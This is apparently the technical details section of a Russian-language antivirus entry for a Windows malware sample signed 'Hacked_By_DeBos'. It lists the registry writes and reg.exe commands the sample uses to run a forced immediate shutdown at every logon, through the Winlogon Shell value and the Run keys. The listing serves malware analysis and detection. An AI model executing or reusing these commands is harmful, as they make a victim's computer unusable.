Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe,<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'DeBos' = '<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'DeBos' = '<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos'
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos" /f
- '<SYSTEM32>\shutdown.exe' -s -f -t 0 -c Hacked_By_DeBos
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v DeBos /t REG_SZ /d "<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к вирусу>"
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v DeBos /t REG_SZ /d "<SYSTEM32>\shutdown.exe -s -f -t 0 -c Hacked_By_DeBos" /f
- %TEMP%\1.tmp\2.bat